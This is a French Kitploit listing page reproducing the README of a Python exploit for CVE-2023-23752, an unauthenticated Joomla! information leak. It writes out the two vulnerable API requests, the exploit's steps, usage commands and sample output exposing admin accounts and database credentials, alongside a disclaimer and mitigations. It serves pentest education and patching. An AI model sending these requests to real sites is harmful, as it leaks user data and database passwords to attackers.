Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23752 — Port Python de l'exploit CVE-2023-23752 — Joomla! < 4.2.8 divulgation d'informations non authentifiée (liste des utilisateurs + fuite des identifiants de base de données) | Kitploit
Outils/GitHubGitHub/bardlaudian/cve-2023-23752
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

Port Python de l'exploit CVE-2023-23752 — Joomla! < 4.2.8 divulgation d'informations non authentifiée (liste des utilisateurs + fuite des identifiants de base de données)

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-23752 — Joomla! < 4.2.8 Divulgation d'informations non authentifiée

Python CVE Platform

⚠️ Avertissement : Cet outil est destiné à des fins éducatives et uniquement à des tests de pénétration autorisés. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. Toute utilisation non autorisée est illégale.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnement
  • Prérequis
  • Installation
  • Utilisation
  • Exemples
  • Atténuations
  • Crédits
  • Références

Aperçu

Joomla! est l'un des systèmes de gestion de contenu (CMS) open source les plus utilisés. Les versions exposent deux points de terminaison API sans contrôle d'accès approprié, permettant à un attaquant de récupérer des informations sensibles : les comptes utilisateurs enregistrés et, dans des configurations vulnérables, les identifiants de la base de données du site.

4.0.0 à 4.2.7
non authentifié

La vulnérabilité a été découverte par Zewei Zhang du laboratoire NSFOCUS TIANJI et signalée au projet Joomla!, qui a publié un correctif dans la version 4.2.8. Elle a reçu l'identifiant CVE-2023-23752.

Ce dépôt contient un portage Python de l'exploit Ruby original publié par ACCEIS.


Détails de la vulnérabilité

ChampValeur
CVECVE-2023-23752
Versions concernéesJoomla! 4.0.0 – 4.2.7
TypeContrôle d'accès inadéquat / Divulgation d'informations
PrivilègesAucun (non authentifié)
ImpactDivulgation des comptes utilisateurs et des identifiants DB
CorrectifJoomla! 4.2.8 (publié en 2023)

Fonctionnement

Les points de terminaison du service web de l'API REST de Joomla sont censés imposer l'authentification et les vérifications d'accès avant de renvoyer des données. Dans les versions concernées, deux points de terminaison ne parviennent pas à effectuer cette vérification correctement lorsqu'ils sont appelés avec le paramètre de requête public=true, traitant la requête comme si elle provenait d'un niveau d'accès « public » anonyme qui ne devrait exposer que des données non sensibles — mais divulguent en fait des informations internes.

Les points de terminaison vulnérables

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • Le point de terminaison users renvoie la liste complète des comptes enregistrés : id, nom d'affichage, nom d'utilisateur, email et appartenance aux groupes.
  • Le point de terminaison config renvoie la configuration de l'application, y compris — lorsque le programme d'installation n'a pas été supprimé/renforcé — l'hôte de la base de données, le nom d'utilisateur, le mot de passe, le nom de la base de données, le préfixe et les paramètres de chiffrement.

Déroulement de l'exploit

Le script automatise les étapes suivantes :

root@kitploit:~
1. Send GET request to /api/index.php/v1/users?public=true
2. Parse the JSON:API response and extract user records
3. Send GET request to /api/index.php/v1/config/application?public=true
4. Parse the JSON:API response and extract site + database configuration
5. Print both datasets to the console

Aucune authentification, session ou jeton CSRF n'est requis à aucun moment — toute l'attaque consiste en deux requêtes GET non authentifiées.


Prérequis

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

Installation

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

Utilisation

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         Base URL of the target, e.g. http://dev.devvortex.htb

options:
  -h, --help  show this help message and exit

Exemples

Utilisation basique

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

Contre une cible de type HTB

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

Exemple de sortie

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

Atténuations

  • Mettez à jour Joomla! vers la version 4.2.8 ou ultérieure — c'est la seule correction complète.
  • Restreignez l'accès à /api/index.php/* au niveau du serveur web ou du WAF si la mise à jour n'est pas immédiatement possible.
  • Changez les identifiants de tous les comptes ou utilisateurs de base de données qui ont pu être exposés via ce point de terminaison avant l'application du correctif.
  • Surveillez les journaux d'accès pour détecter des requêtes non authentifiées vers les chemins du service web /api/index.php/v1/.

Crédits

  • Vulnérabilité découverte par : Zewei Zhang, NSFOCUS TIANJI Lab
  • Exploit original (Ruby) : noraj (Alexandre ZANNI) pour ACCEIS — dépôt original
  • Portage Python : Bardlaudian

Références

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • Avis PacketStorm
  • Avis de sécurité Joomla!
  • Avis du découvreur — NSFOCUS
  • Exploit Ruby original — Acceis
Télécharger l’outil